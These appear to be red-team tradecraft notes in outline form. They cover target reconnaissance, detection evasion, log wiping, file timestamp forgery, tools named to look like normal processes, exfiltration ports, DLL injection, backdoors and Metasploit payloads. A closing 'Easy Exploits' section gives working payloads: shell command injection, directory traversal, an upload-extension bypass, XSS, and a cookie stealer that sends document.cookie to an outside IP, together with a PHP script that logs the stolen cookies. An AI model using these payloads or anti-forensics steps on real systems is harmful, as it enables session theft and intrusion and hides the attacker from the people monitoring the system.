Exploitation
The Basics
- Determining potential security posture
- Are they using an up to date OS?
- What kind of personal security products are installed?
- Are they using a free antivirus tool, or are they using an enterprise-based commercial antivirus tool?
- Is the system patched up to date?
- Is there a bunch of bloatware? Or is the box rather Spartan, as a corporate load should typically be?
- Tradecraft Rules
- Rule #1: Do No Harm
- Never leave a target’s equipment less secure than when you found it
- Do not patch vulnerable software or install defensive tools such as wireshark or nmap
- Never knowingly disrupt a target’s network or system without express permission from a competent authority
- This is not your personal computer.
- Rule #2: No packets directly between source and target
- Rule #3: Have a clue
- Always have a plan and a goal
- Execute your operation quietly
- Know when to get help
- Rule #4: Do not scan everything under the Sun
- Noise kills
- Rule #5: Upload wisely
- Upload only what you need
- Use single binaries
- Do not use public packages
- Rule #6: Clean your logs
- Do not remove every log
- Clean only entries related to your activity
- Reset file time to last entry
- Rule #7: Practice and don’t run untested tools
- Never practice on a live system
- Review all code before running, even in a lab
- Rule #8: Situational Awareness
- Always be concerned about compromising your tools, techniques, and methods
- Rule #9: Check yourself, before you wreck yourself
- Check your ego at the door
- Ask for help if you need it
- Rule #1: Do No Harm
- Exfiltration Strategies
- Port targeting
- Blend in with environment
- Redirector selection
- Ports should make sense (80, 443, 25, etc)
- Firewalls, proxies, and other systems may affect traffic on these ports
- Avoid these ports:
- 135 & 445 (NetBIOS, SMB)
- 1433 and other SQL ports
- 6667 (IRC)
- 666, 1337, 4444, 6666, 31337, 12345 (Known malware, hacking activity)
- Consider geographic factors of redirector
- File manipulation
- Match the modified time to other files
- Name your tools to resemble normal processes
- Cleaning up
- Remove temporary files, tools, tool generated logs, etc
- Did you schedule a job in Windows? If so, it was probably logged. Delete those logs.
- Did you substitute user (su) on a UNIX system? If so, it was probably logged. Remove those entries.
- Did you cause a core dump or a mini-dump? If so, delete those dump files.
- Are you responsible for any hanging processes? If so, kill those processes.
- Clean the prefetch directory
- Port targeting
- Exploitation through tunnels
- Additional considerations need to be taken into account, such as latency
- Not all tools will work through a tunnel the same way
- Don’t forget to change “RPORT” to the tunnel redirector!
- Privilege Escalation Rules to remember
- Never escalate to a critical process unless you know what you are doing
- Know your privileges (flags)
- User processes go away when a user logs off
- Shellcode
- Written in Assembly code
- Techniques
- Find socket
- Uses an existing connection between you and the target
- Reverse shell
- Port binding
- Command execution
- Useful when you do not need a network connection
- File transfer
- Multi-stage
- Syscall proxy
- Requires few processes and network connections
- Allows access to core OS functions
- Executes in a loop, strings together requests
- Usually part of a framework type of application
- Process injection
- Find socket
- Code Injection
- Overflow Types
- Buffer
- Stack
- Heap
- Integer
- Off-by-one Error
- Buffer
- Heap Spraying
- Not an exploit method
- Payload delivery technique
- DLL Injection
- Windows Hooking
- Calls code when a specific event occurs
- Commonly used for Keylogging
- AppInit Key
- Runs with user32.dll
- CreateRemoteThread Function
- Injects DLL into running process
- Reflective DLL Injection
- Injects a loader in the process
- Advantages:
- Not registered or listed in process modules
- No hooking
- Fileless
- Can be found in memory forensics
- DLL Path Hijacking
- Search-order hijacking
- Windows Hooking
- Countermeasures
- Endpoint Security - Hook into functions typically used for injection
- Code signing
- Overflow Types
- Backdoor Methods
- Batch files/init scripts
- Autorun keys
- AppInit Key
- DLL injection
- Trojan Application
- Install as a Service
- Load as a driver
- Metasploit
- Some local commands can be ran from the framework console
- /usr/share/metasploit-framework/
- Payloads
- Bind - Shell connects directly to victim
- Reverse - Victim calls back to you
- “DisablePayloadHandler”
- Prevents MS from automatically attempting to connect the payload
- You can then use exploit/multi/handler to “call forward”
- Masquerades
- Logging into a remote access service with valid credentials that are not yours
- Implants
- Backdoor
- Requires the operator to connect to it
- May require 2 tunnels, both a forward and reverse. One for the trigger packet and one for the callback.
- Beacon
- Periodically attempts to initiate a connection to the operator
- Backdoor
Some Easy Exploits
Non-secure C
Takes advantage of a poorly written application.
First %s is taken as input then our code executes independently. Using this method you could print sensitive values that may only be normally accessible by the application.
%s%sprintf(password)%sWeb
Code Injection (for input that will be processed directly in a shell)
<normal input> & <command>IIS 6, circumvent file extension validation
Add ;.jpg (or other valid ext) to file being uploaded
PHP Directory Traversal
index.php?page=./../../../fileCookies
<script>window.location='http://10.1.1.1/?'+document.cookie;</script>Simple Cookie Stealer
Host
<?php
$cookie=$_GET["cookie"];
$log=fopen("log.txt", “a”);
fwrite($log, $cookie ."\n");
fclose($log);
?>Phish
[url]=<script>window.location='my_url/cookie_stealer.php?cookie='%2bdocument.cookie;</script>XSS
- Find vulns in page such as
<url>?search= - Test input for sanitation
- Exploit!
<script>[command]("[code]");</script>
Ex: http://www.google.com/page.html?default=<script>alert("Hacked!");</script>